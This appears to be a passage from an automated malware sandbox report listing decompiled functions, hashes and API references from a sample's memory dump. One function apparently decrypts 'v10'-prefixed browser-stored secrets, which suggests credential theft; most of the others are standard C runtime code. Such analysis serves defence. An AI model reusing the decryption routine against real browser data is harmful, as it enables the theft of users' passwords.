                                                                                                                              • Opcode Fuzzy Hash: 3f8be9e51290dcc651e7121cd800779f8bce3a9782d89db55d4154487ca158d0
                                                                                                                              • Instruction Fuzzy Hash: 68018E31E06A119BDA20AB65984675E77A0AB44724F14413BE800B32C1CB3C7942CFEE
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041D730, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 144COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 29%
                                                                                                                              			E0041D730(void* __ebx, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				signed int _v92;
				intOrPtr _v96;
				signed int _v100;
				char _v128;
				signed int _v132;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t70;
				void* _t94;
				char* _t129;
				void* _t130;
				intOrPtr _t131;
				void* _t132;
				signed int _t133;
				intOrPtr _t143;

				_t94 = __ebx;
				_push(0xffffffff);
				_push(E0042648B);
				_push( *[fs:0x0]);
				_t69 =  *0x4301f4; // 0xe687535
				_t70 = _t69 ^ _t133;
				_v100 = _t70;
				_push(_t131);
				_push(_t129);
				_push(_t70);
				 *[fs:0x0] =  &_v16;
				_v132 = 0;
				if(_a12 < 3) {
					L10:
					_t120 = _a12;
					E004011C0(_a4, E0041CD30(_a12, _t129, _t131, 0, _a8, _a12));
					_v132 = _v132 | 0x00000001;
					_t75 = _a4;
					L11:
					 *[fs:0x0] = _v16;
					_pop(_t130);
					_pop(_t132);
					return E00404354(_t75, _t94, _v100 ^ _t133, _t120, _t130, _t132);
				}
				_t129 = "v10";
				_t131 = _a8;
				asm("repe cmpsb");
				if(0 != 0) {
					goto L10;
				} else {
					_t143 = _a20;
					_t120 = 0 | _t143 != 0x00000000;
					if(((0 | _a16 != 0x00000000) & _t143 != 0x00000000) == 0) {
						E004011C0(_a4, "null");
						_v132 = _v132 | 0x00000001;
						_t75 = _a4;
					} else {
						E004091C0( &_v88, 0, 0x40);
						_v88 = 0x40;
						_v84 = 1;
						_v80 = _a8 + 3;
						_v76 = 0xc;
						_v64 = _v80 + _a12 - 0x13;
						_v60 = 0x10;
						_t120 = _a12 - 3 - _v76 - _v60;
						_v92 = _a12 - 3 - _v76 - _v60;
						_v96 =  *0x432854(0x40, _v92);
						if(_v96 != 0) {
							_t120 = _v92;
							_v20 =  *0x4328cc(_a20, _v80 + _v76, _v92,  &_v88, 0, 0, _v96, _v92,  &_v92, 0);
							if(_v20 < 0) {
								E004011C0(_a4, "null");
								_v132 = _v132 | 0x00000001;
								_t75 = _a4;
							} else {
								E00403F50( &_v128, _v96, _v92);
								_v8 = 0;
								E00401240(_a4,  &_v128);
								_t120 = _v132 | 0x00000001;
								_v132 = _v132 | 0x00000001;
								_v8 = 0xffffffff;
								E004012D0( &_v128);
								_t75 = _a4;
							}
						}
					}
					goto L11;
				}
			}




























                                                                                                                              0x0041d730
                                                                                                                              0x0041d733
                                                                                                                              0x0041d735
                                                                                                                              0x0041d740
                                                                                                                              0x0041d744
                                                                                                                              0x0041d749
                                                                                                                              0x0041d74b
                                                                                                                              0x0041d74e
                                                                                                                              0x0041d74f
                                                                                                                              0x0041d750
                                                                                                                              0x0041d754
                                                                                                                              0x0041d75a
                                                                                                                              0x0041d765
                                                                                                                              0x0041d8b6
                                                                                                                              0x0041d8b6
                                                                                                                              0x0041d8ca
                                                                                                                              0x0041d8d5
                                                                                                                              0x0041d8d8
                                                                                                                              0x0041d8db
                                                                                                                              0x0041d8de
                                                                                                                              0x0041d8e6
                                                                                                                              0x0041d8e7
                                                                                                                              0x0041d8f5
                                                                                                                              0x0041d8f5
                                                                                                                              0x0041d770
                                                                                                                              0x0041d775
                                                                                                                              0x0041d77a
                                                                                                                              0x0041d77c
                                                                                                                              0x00000000
                                                                                                                              0x0041d782
                                                                                                                              0x0041d78d
                                                                                                                              0x0041d791
                                                                                                                              0x0041d796
                                                                                                                              0x0041d8a1
                                                                                                                              0x0041d8ac
                                                                                                                              0x0041d8af
                                                                                                                              0x0041d79c
                                                                                                                              0x0041d7a4
                                                                                                                              0x0041d7ac
                                                                                                                              0x0041d7b3
                                                                                                                              0x0041d7c0
                                                                                                                              0x0041d7c3
                                                                                                                              0x0041d7d4
                                                                                                                              0x0041d7d7
                                                                                                                              0x0041d7e7
                                                                                                                              0x0041d7ea
                                                                                                                              0x0041d7f9
                                                                                                                              0x0041d800
                                                                                                                              0x0041d81c
                                                                                                                              0x0041d831
                                                                                                                              0x0041d838
                                                                                                                              0x0041d884
                                                                                                                              0x0041d88f
                                                                                                                              0x0041d892
                                                                                                                              0x0041d83a
                                                                                                                              0x0041d845
                                                                                                                              0x0041d84a
                                                                                                                              0x0041d858
                                                                                                                              0x0041d860
                                                                                                                              0x0041d863
                                                                                                                              0x0041d866
                                                                                                                              0x0041d870
                                                                                                                              0x0041d875
                                                                                                                              0x0041d875
                                                                                                                              0x0041d838
                                                                                                                              0x0041d800
                                                                                                                              0x00000000
                                                                                                                              0x0041d796

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset
                                                                                                                              • String ID: @$null$null$v10
                                                                                                                              • API String ID: 2102423945-142188288
                                                                                                                              • Opcode ID: 08f85b548037c1a3eff85f49ec059fae9ba0d3ead2541e9c33720b85b54bc36a
                                                                                                                              • Instruction ID: 6db23229f21a6e608e8a6053353fe2398a331c56b1330644fce70f190f6e2a5f
                                                                                                                              • Opcode Fuzzy Hash: 08f85b548037c1a3eff85f49ec059fae9ba0d3ead2541e9c33720b85b54bc36a
                                                                                                                              • Instruction Fuzzy Hash: 8551FCB1E002089FDB08DFD9D895BDEBBB5FF48304F10812AF515AB294DB74A945CB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041F7B0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041F7B0(void* __edx, void* __edi, void* __esi, WCHAR* _a4) {
				LPWSTR* _v8;
				LPWSTR* _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				LPWSTR* _t63;
				WCHAR* _t69;
				void* _t79;
				void* _t108;
				void* _t110;

				_v8 = 0;
				if(_a4 == 0 || ( *_a4 & 0x0000ffff) == 0) {
					E0041F590(2);
					return 0;
				} else {
					_t63 = E0040537B(__edx, __edi, __esi, 0x47c);
					_t110 = _t108 + 4;
					_v8 = _t63;
					if(_v8 == 0) {
						_v12 = 1;
					} else {
						_v8[0x11d] = 0xffffffff;
						_v8[0x11e] = 0;
						_v8[0x11c] = 0;
						_v16 = GetFullPathNameW(_a4, 0, 0, 0);
						_t69 = E0040537B(_a4, __edi, __esi, _v16 + _v16 + 0x10);
						_t110 = _t110 + 4;
						_v8[0x11e] = _t69;
						if(_v8[0x11e] == 0) {
							_v12 = 1;
						} else {
							_v16 = GetFullPathNameW(_a4, _v16, _v8[0x11e], 0);
							if(_v16 <= 0) {
								E0041F590(2);
								_t110 = _t110 + 4;
								_v12 = 1;
							} else {
								_v20 =  &(_v8[0x11e][_v16]);
								if(_v8[0x11e] < _v20) {
									_v24 =  *(_v20 - 2) & 0x0000ffff;
									if(_v24 != 0x2f && _v24 != 0x3a && _v24 != 0x5c) {
										 *_v20 = 0x5c;
										_v20 =  &(_v20[1]);
									}
								}
								 *_v20 = 0x2a;
								_v20 =  &(_v20[1]);
								 *_v20 = 0;
								_t79 = E0041F6B0(0, _v8);
								_t110 = _t110 + 4;
								if(_t79 == 0) {
									_v12 = 1;
									E0041F590(2);
									_t110 = _t110 + 4;
								} else {
									_v12 = 0;
								}
							}
						}
					}
					if(_v12 != 0 && _v8 != 0) {
						E0041F720(_v8, _v8);
						_v8 = 0;
					}
					return _v8;
				}
			}













                                                                                                                              0x0041f7b6
                                                                                                                              0x0041f7c1
                                                                                                                              0x0041f7cf
                                                                                                                              0x00000000
                                                                                                                              0x0041f7de
                                                                                                                              0x0041f7e3
                                                                                                                              0x0041f7e8
                                                                                                                              0x0041f7eb
                                                                                                                              0x0041f7f2
                                                                                                                              0x0041f93a
                                                                                                                              0x0041f7f8
                                                                                                                              0x0041f7fb
                                                                                                                              0x0041f808
                                                                                                                              0x0041f815
                                                                                                                              0x0041f82f
                                                                                                                              0x0041f83a
                                                                                                                              0x0041f83f
                                                                                                                              0x0041f845
                                                                                                                              0x0041f855
                                                                                                                              0x0041f931
                                                                                                                              0x0041f85b
                                                                                                                              0x0041f875
                                                                                                                              0x0041f87c
                                                                                                                              0x0041f920
                                                                                                                              0x0041f925
                                                                                                                              0x0041f928
                                                                                                                              0x0041f882
                                                                                                                              0x0041f891
                                                                                                                              0x0041f8a0
                                                                                                                              0x0041f8a9
                                                                                                                              0x0041f8b0
                                                                                                                              0x0041f8ca
                                                                                                                              0x0041f8d3
                                                                                                                              0x0041f8d3
                                                                                                                              0x0041f8b0
                                                                                                                              0x0041f8de
                                                                                                                              0x0041f8e7
                                                                                                                              0x0041f8ef
                                                                                                                              0x0041f8f6
                                                                                                                              0x0041f8fb
                                                                                                                              0x0041f900
                                                                                                                              0x0041f90b
                                                                                                                              0x0041f914
                                                                                                                              0x0041f919
                                                                                                                              0x0041f902
                                                                                                                              0x0041f902
                                                                                                                              0x0041f902
                                                                                                                              0x0041f91c
                                                                                                                              0x0041f92f
                                                                                                                              0x0041f938
                                                                                                                              0x0041f945
                                                                                                                              0x0041f951
                                                                                                                              0x0041f959
                                                                                                                              0x0041f959
                                                                                                                              0x00000000
                                                                                                                              0x0041f960

                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 0041F7E3
                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041F829
                                                                                                                              • _malloc.LIBCMT ref: 0041F83A
                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,?,?,00000000), ref: 0041F86F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FullNamePath_malloc
                                                                                                                              • String ID: \
                                                                                                                              • API String ID: 3141036907-2967466578
                                                                                                                              • Opcode ID: 591764a51ae57c1d639d9e101fbe53a5a95207a2bd42d8ba35574e4cf491d787
                                                                                                                              • Instruction ID: 8a36608226c34a9c5f29b167a6d21b1c2e9ee0c8d078a1cfab391da1692c6373
                                                                                                                              • Opcode Fuzzy Hash: 591764a51ae57c1d639d9e101fbe53a5a95207a2bd42d8ba35574e4cf491d787
                                                                                                                              • Instruction Fuzzy Hash: 2C5173B0D04208EBDB14DFA4C545BEEB7B0FF04304F2445BAD519AB391E7789A8ACB55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00425DA1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 27%
                                                                                                                              			E00425DA1(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E00425D0F(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E004252E1(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E00425791(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_t14 = _t22 + 0xc; // 0x6e
				_push(_t27);
				_push(_a4);
				_t20 = E004259F4(_t22,  *_t14, _t26, _t27, _t31);
				if(_t20 != 0) {
					E004252A8(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                                                                                                                              0x00425da1
                                                                                                                              0x00425da1
                                                                                                                              0x00425da1
                                                                                                                              0x00425da1
                                                                                                                              0x00425da6
                                                                                                                              0x00425daa
                                                                                                                              0x00425dac
                                                                                                                              0x00425daf
                                                                                                                              0x00425db0
                                                                                                                              0x00425db1
                                                                                                                              0x00425db4
                                                                                                                              0x00425db9
                                                                                                                              0x00425db9
                                                                                                                              0x00425dbc
                                                                                                                              0x00425dc0
                                                                                                                              0x00425dc3
                                                                                                                              0x00425dc8
                                                                                                                              0x00425dc5
                                                                                                                              0x00425dc5
                                                                                                                              0x00425dc5
                                                                                                                              0x00425dcb
                                                                                                                              0x00425dd0
                                                                                                                              0x00425dd2
                                                                                                                              0x00425dd5
                                                                                                                              0x00425dd8
                                                                                                                              0x00425dd9
                                                                                                                              0x00425de1
                                                                                                                              0x00425de6
                                                                                                                              0x00425dea
                                                                                                                              0x00425ded
                                                                                                                              0x00425df0
                                                                                                                              0x00425df3
                                                                                                                              0x00425df6
                                                                                                                              0x00425df7
                                                                                                                              0x00425dfa
                                                                                                                              0x00425e04
                                                                                                                              0x00425e08
                                                                                                                              0x00000000
                                                                                                                              0x00425e08
                                                                                                                              0x00425e0e

                                                                                                                              APIs
                                                                                                                              • ___BuildCatchObject.LIBCMT ref: 00425DB4
                                                                                                                                • Part of subcall function 00425D0F: ___BuildCatchObjectHelper.LIBCMT ref: 00425D45
                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00425DCB
                                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 00425DD9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                              • String ID: csm$csm
                                                                                                                              • API String ID: 2163707966-3733052814
                                                                                                                              • Opcode ID: 50106dbe3085d0e97134de8a49b133a93f62fdee1138184848a79e6080759471
                                                                                                                              • Instruction ID: f333cc1b613ff98a627f89863f56b649b3c859ed8e15c440b03227754eabcb04
                                                                                                                              • Opcode Fuzzy Hash: 50106dbe3085d0e97134de8a49b133a93f62fdee1138184848a79e6080759471
                                                                                                                              • Instruction Fuzzy Hash: 34012871100929BBDF126F51EC45EAB3F6AEF04354F90801ABD0814161D73A99B1DBA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004061D1, Relevance: 7.7, APIs: 5, Instructions: 160COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E004061D1(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				char _t89;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				signed int _t109;
				char* _t110;
				signed int _t119;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;

				_t110 = _a4;
				_t108 = _a8;
				_t122 = _a12;
				_v12 = _t110;
				_v8 = _t108;
				if(_t122 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t130 = _t110;
					if(_t110 != 0) {
						_t125 = _a20;
						__eflags = _t125;
						if(_t125 == 0) {
							L9:
							__eflags = _t108 - 0xffffffff;
							if(_t108 != 0xffffffff) {
								_t82 = E004091C0(_t110, 0, _t108);
								_t126 = _t126 + 0xc;
							}
							__eflags = _t125;
							if(__eflags == 0) {
								goto L3;
							} else {
								__eflags = _a16 - (_t82 | 0xffffffff) / _t122;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t123 = _t122 * _a16;
								__eflags =  *(_t125 + 0xc) & 0x0000010c;
								_v20 = _t123;
								_t109 = _t123;
								if(( *(_t125 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t125 + 0x18));
								}
								__eflags = _t123;
								if(_t123 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t125 + 0xc) & 0x0000010c;
										if(( *(_t125 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t109 - _v16;
											if(_t109 < _v16) {
												_t89 = E0040C6BF(_t109, _t123, _t125);
												__eflags = _t89 - 0xffffffff;
												if(_t89 == 0xffffffff) {
													L45:
													return (_t123 - _t109) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L41:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E004091C0(_a4, 0, _a8);
													}
													 *((intOrPtr*)(E00405A49(__eflags))) = 0x22;
													L4:
													E00407461();
													goto L5;
												}
												_t112 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t89;
												_t109 = _t109 - 1;
												_t65 =  &_v8;
												 *_t65 = _v8 - 1;
												__eflags =  *_t65;
												_v16 =  *((intOrPtr*)(_t125 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t96 = 0x7fffffff;
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t96 = _t109;
												}
											} else {
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t50 = _t109 % _v16;
													__eflags = _t50;
													_t119 = _t50;
													_t101 = _t109;
												} else {
													_t119 = 0x7fffffff % _v16;
													_t101 = 0x7fffffff;
												}
												_t96 = _t101 - _t119;
											}
											__eflags = _t96 - _v8;
											if(_t96 > _v8) {
												goto L41;
											} else {
												_push(_t96);
												_push(_v12);
												_t97 = E0040AE85(_t125);
												_pop(_t112);
												_push(_t97);
												_t98 = E0040CD98(_t109, _t123, _t125, __eflags);
												_t126 = _t126 + 0xc;
												__eflags = _t98;
												if(_t98 == 0) {
													 *(_t125 + 0xc) =  *(_t125 + 0xc) | 0x00000010;
													goto L45;
												}
												__eflags = _t98 - 0xffffffff;
												if(_t98 == 0xffffffff) {
													L44:
													_t72 = _t125 + 0xc;
													 *_t72 =  *(_t125 + 0xc) | 0x00000020;
													__eflags =  *_t72;
													goto L45;
												}
												_v12 = _v12 + _t98;
												_t109 = _t109 - _t98;
												_v8 = _v8 - _t98;
												goto L39;
											}
										}
										_t104 =  *(_t125 + 4);
										__eflags = _t104;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L44;
										}
										_t124 = _t109;
										__eflags = _t109 - _t104;
										if(_t109 >= _t104) {
											_t124 = _t104;
										}
										__eflags = _t124 - _v8;
										if(_t124 > _v8) {
											goto L41;
										} else {
											E0040518C(_t112, _v12, _v8,  *_t125, _t124);
											 *(_t125 + 4) =  *(_t125 + 4) - _t124;
											 *_t125 =  *_t125 + _t124;
											_v12 = _v12 + _t124;
											_t109 = _t109 - _t124;
											_t126 = _t126 + 0x10;
											_v8 = _v8 - _t124;
											_t123 = _v20;
										}
										L39:
										__eflags = _t109;
									} while (_t109 != 0);
									goto L40;
								}
							}
						}
						_t82 = (_t82 | 0xffffffff) / _t122;
						__eflags = _a16 - _t82;
						if(_a16 <= _t82) {
							goto L13;
						}
						goto L9;
					}
					L3:
					 *((intOrPtr*)(E00405A49(_t130))) = 0x16;
					goto L4;
				}
			}



























                                                                                                                              0x004061d9
                                                                                                                              0x004061dd
                                                                                                                              0x004061e2
                                                                                                                              0x004061e5
                                                                                                                              0x004061e8
                                                                                                                              0x004061ed
                                                                                                                              0x00406209
                                                                                                                              0x00000000
                                                                                                                              0x004061f5
                                                                                                                              0x004061f5
                                                                                                                              0x004061f7
                                                                                                                              0x00406210
                                                                                                                              0x00406213
                                                                                                                              0x00406215
                                                                                                                              0x00406223
                                                                                                                              0x00406223
                                                                                                                              0x00406226
                                                                                                                              0x0040622c
                                                                                                                              0x00406231
                                                                                                                              0x00406231
                                                                                                                              0x00406234
                                                                                                                              0x00406236
                                                                                                                              0x00000000
                                                                                                                              0x00406238
                                                                                                                              0x0040623f
                                                                                                                              0x00406242
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406244
                                                                                                                              0x00406244
                                                                                                                              0x00406248
                                                                                                                              0x0040624f
                                                                                                                              0x00406252
                                                                                                                              0x00406254
                                                                                                                              0x0040625e
                                                                                                                              0x00406256
                                                                                                                              0x00406259
                                                                                                                              0x00406259
                                                                                                                              0x00406265
                                                                                                                              0x00406267
                                                                                                                              0x00406347
                                                                                                                              0x00000000
                                                                                                                              0x0040626d
                                                                                                                              0x0040626d
                                                                                                                              0x0040626d
                                                                                                                              0x00406274
                                                                                                                              0x004062ba
                                                                                                                              0x004062ba
                                                                                                                              0x004062bd
                                                                                                                              0x0040631c
                                                                                                                              0x00406322
                                                                                                                              0x00406325
                                                                                                                              0x00406379
                                                                                                                              0x00000000
                                                                                                                              0x0040637f
                                                                                                                              0x00406327
                                                                                                                              0x0040632b
                                                                                                                              0x0040634f
                                                                                                                              0x0040634f
                                                                                                                              0x00406353
                                                                                                                              0x0040635d
                                                                                                                              0x00406362
                                                                                                                              0x0040636a
                                                                                                                              0x00406204
                                                                                                                              0x00406204
                                                                                                                              0x00000000
                                                                                                                              0x00406204
                                                                                                                              0x0040632d
                                                                                                                              0x00406330
                                                                                                                              0x00406333
                                                                                                                              0x00406338
                                                                                                                              0x00406339
                                                                                                                              0x00406339
                                                                                                                              0x00406339
                                                                                                                              0x0040633c
                                                                                                                              0x00000000
                                                                                                                              0x0040633c
                                                                                                                              0x004062bf
                                                                                                                              0x004062c3
                                                                                                                              0x004062e4
                                                                                                                              0x004062e9
                                                                                                                              0x004062eb
                                                                                                                              0x004062ed
                                                                                                                              0x004062ed
                                                                                                                              0x004062c5
                                                                                                                              0x004062cc
                                                                                                                              0x004062ce
                                                                                                                              0x004062db
                                                                                                                              0x004062db
                                                                                                                              0x004062db
                                                                                                                              0x004062de
                                                                                                                              0x004062d0
                                                                                                                              0x004062d2
                                                                                                                              0x004062d5
                                                                                                                              0x004062d5
                                                                                                                              0x004062e0
                                                                                                                              0x004062e0
                                                                                                                              0x004062ef
                                                                                                                              0x004062f2
                                                                                                                              0x00000000
                                                                                                                              0x004062f4
                                                                                                                              0x004062f4
                                                                                                                              0x004062f5
                                                                                                                              0x004062f9
                                                                                                                              0x004062fe
                                                                                                                              0x004062ff
                                                                                                                              0x00406300
                                                                                                                              0x00406305
                                                                                                                              0x00406308
                                                                                                                              0x0040630a
                                                                                                                              0x00406387
                                                                                                                              0x00000000
                                                                                                                              0x00406387
                                                                                                                              0x0040630c
                                                                                                                              0x0040630f
                                                                                                                              0x00406375
                                                                                                                              0x00406375
                                                                                                                              0x00406375
                                                                                                                              0x00406375
                                                                                                                              0x00000000
                                                                                                                              0x00406375
                                                                                                                              0x00406311
                                                                                                                              0x00406314
                                                                                                                              0x00406316
                                                                                                                              0x00000000
                                                                                                                              0x00406316
                                                                                                                              0x004062f2
                                                                                                                              0x00406276
                                                                                                                              0x00406279
                                                                                                                              0x0040627b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040627d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406283
                                                                                                                              0x00406285
                                                                                                                              0x00406287
                                                                                                                              0x00406289
                                                                                                                              0x00406289
                                                                                                                              0x0040628b
                                                                                                                              0x0040628e
                                                                                                                              0x00000000
                                                                                                                              0x00406294
                                                                                                                              0x0040629d
                                                                                                                              0x004062a2
                                                                                                                              0x004062a5
                                                                                                                              0x004062a7
                                                                                                                              0x004062aa
                                                                                                                              0x004062ac
                                                                                                                              0x004062af
                                                                                                                              0x004062b2
                                                                                                                              0x004062b2
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x0040633f
                                                                                                                              0x00000000
                                                                                                                              0x0040626d
                                                                                                                              0x00406267
                                                                                                                              0x00406236
                                                                                                                              0x0040621c
                                                                                                                              0x0040621e
                                                                                                                              0x00406221
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00406221
                                                                                                                              0x004061f9
                                                                                                                              0x004061fe
                                                                                                                              0x00000000
                                                                                                                              0x004061fe

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4048096073-0
                                                                                                                              • Opcode ID: 0cf97bb49f6c97081f8a1c80fee2c433a59ae391689aac8020b9d3edf1ee0f1c
                                                                                                                              • Instruction ID: 40ac34ee9ba8a548f40a2df405a56ce8ab59ab566faee64280c6a9bcd3e2d158
                                                                                                                              • Opcode Fuzzy Hash: 0cf97bb49f6c97081f8a1c80fee2c433a59ae391689aac8020b9d3edf1ee0f1c
                                                                                                                              • Instruction Fuzzy Hash: 8051C930A00205DBDB24AFA9884469FB7B1EF40324F15467FEC26762D1D7389D61DF99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040F522, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 94%
                                                                                                                              			E0040F522(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x43149c, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x431ac8 - _t7;
								if(__eflags == 0) {
									_t9 = E00405A49(__eflags);
									 *_t9 = E00405A07(GetLastError());
									goto L17;
								} else {
									__eflags = E00408F17(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00405A49(__eflags);
										 *_t12 = E00405A07(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00408F17(_t6, _t30);
						 *((intOrPtr*)(E00405A49(__eflags))) = 0xc;
						goto L12;
					} else {
						E00405341(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0040537B(__edx, __edi, __esi, _a8);
				}
			}









                                                                                                                              0x0040f52b
                                                                                                                              0x0040f538
                                                                                                                              0x0040f539
                                                                                                                              0x0040f53c
                                                                                                                              0x0040f53e
                                                                                                                              0x0040f54d
                                                                                                                              0x0040f580
                                                                                                                              0x0040f580
                                                                                                                              0x0040f583
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040f550
                                                                                                                              0x0040f552
                                                                                                                              0x0040f554
                                                                                                                              0x0040f554
                                                                                                                              0x0040f554
                                                                                                                              0x0040f561
                                                                                                                              0x0040f567
                                                                                                                              0x0040f569
                                                                                                                              0x0040f56b
                                                                                                                              0x0040f5cb
                                                                                                                              0x0040f5cb
                                                                                                                              0x0040f56d
                                                                                                                              0x0040f56d
                                                                                                                              0x0040f573
                                                                                                                              0x0040f5b5
                                                                                                                              0x0040f5c9
                                                                                                                              0x00000000
                                                                                                                              0x0040f575
                                                                                                                              0x0040f57c
                                                                                                                              0x0040f57e
                                                                                                                              0x0040f59d
                                                                                                                              0x0040f5b1
                                                                                                                              0x0040f597
                                                                                                                              0x0040f597
                                                                                                                              0x0040f597
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040f57e
                                                                                                                              0x0040f573
                                                                                                                              0x00000000
                                                                                                                              0x0040f599
                                                                                                                              0x0040f586
                                                                                                                              0x0040f591
                                                                                                                              0x00000000
                                                                                                                              0x0040f540
                                                                                                                              0x0040f543
                                                                                                                              0x0040f549
                                                                                                                              0x0040f549
                                                                                                                              0x0040f59a
                                                                                                                              0x0040f59c
